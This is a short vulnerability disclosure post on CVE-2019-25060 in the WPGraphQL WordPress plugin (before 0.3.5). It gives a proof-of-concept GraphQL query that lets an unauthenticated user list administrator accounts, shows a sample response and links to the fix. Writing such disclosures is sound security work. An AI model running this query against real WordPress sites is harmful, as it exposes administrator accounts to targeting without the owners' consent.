Home Cve 2019 25060 Improper Access Control In Wpgraphql Leaks Wordpress Account Roles
Post
Cancel

Cve 2019 25060 Improper Access Control In Wpgraphql Leaks Wordpress Account Roles

Description

The WPGraphQL plugin (v < 0.3.5) doesn’t properly restrict access to information about other users’ roles on the affected wordpress site. Because of this, a remote attacker could forge a GraphQL query to retrieve the account roles of every user on the site. This has been assigned CVE-2019-25060.

Proof of Concept

  1. Make this GraphQL call as an unauthenticated user on any wordpress site using this plugin:
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    
     query getUsers{
         users(where:{role:ADMINISTRATOR}){
             edges{
                 node{
                     userId
                     name
                 }
             }
         }
     }
    

    The response will be:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    
     {
     "data": {
         "users": {
         "edges": [
             {
             "node": {
                 "userId": 1,
                 "name": "root"
             }
             }
         ]
         }
     }
     }
    

    An unauthenticated user is able to determine the users with admin role on the wordpress site. This issue has been fixed at https://github.com/wp-graphql/wp-graphql/pull/900.

This post is licensed under CC BY 4.0 by the author.